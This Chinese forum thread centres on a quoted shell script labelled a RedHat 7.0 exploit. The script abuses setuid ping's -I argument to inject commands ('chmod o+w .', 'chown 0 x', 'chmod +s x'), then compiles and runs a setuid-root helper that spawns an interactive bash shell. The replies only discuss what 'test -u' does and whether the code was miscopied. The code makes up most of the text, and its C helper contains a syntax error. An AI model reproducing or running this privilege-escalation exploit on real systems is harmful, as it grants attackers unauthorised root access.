看一段代码,对其中一行很不理解

coolc

看一段代码,对其中一行很不理解test -u

  #!/bin/sh
echo
echo "RedHat 7.0  exploit"
echo "(c) 2000 suneagle "
echo
echo "Enjoy hacking! "
echo

PING=/bin/ping
test -u $PING || PING=/bin/ping

if [ ! -u $PING ]; then
  echo "Sorry, no setuid ping."
  exit 0
fi

echo "hase 1: making / world-writable..."

$PING -I ';chmod o+w .' 195.117.3.59 &>/dev/null

sleep 1

echo "hase 2: compiling helper program in /..."

cat >/x.c <<_eof_
main() {
  setuid(0); seteuid(0);
  system("chmod 755 /;rm -f /x; rm -f /x.c";
  execl("/bin/bash","bash","-i",0);
}
_eof_

gcc /x.c -o /x
chmod 755 /x

echo "hase 3: chown+chmod on our helper program..."

$PING -I ';chown 0 x' 202.102.3.1 &>/dev/null
sleep 1
$PING -I ';chmod +s x' 202.101.23.1 &>/dev/null
sleep 1

if [ ! -u /x ]; then
  echo "Apparently, this is not exploitable on this system "
  exit 1
fi

echo "Ye! Entering rootshell..."

/x

echo "Thank you."

nkliyong

-u FileName Returns a True exit value if the specified FileName exists and its Set User ID bit is set.

夜未眠

PING=/bin/ping
test -u $PING || PING=/bin/ping

这样写不是"不管/bin/ping变量是否设置了设置用户id位PING的值都是/bin/ping"了吗？你以哪儿看的代码啊？有不没有抄错？

coolc

永远的UNIX上大鹰的PING漏洞的文章.安全版应该也有吧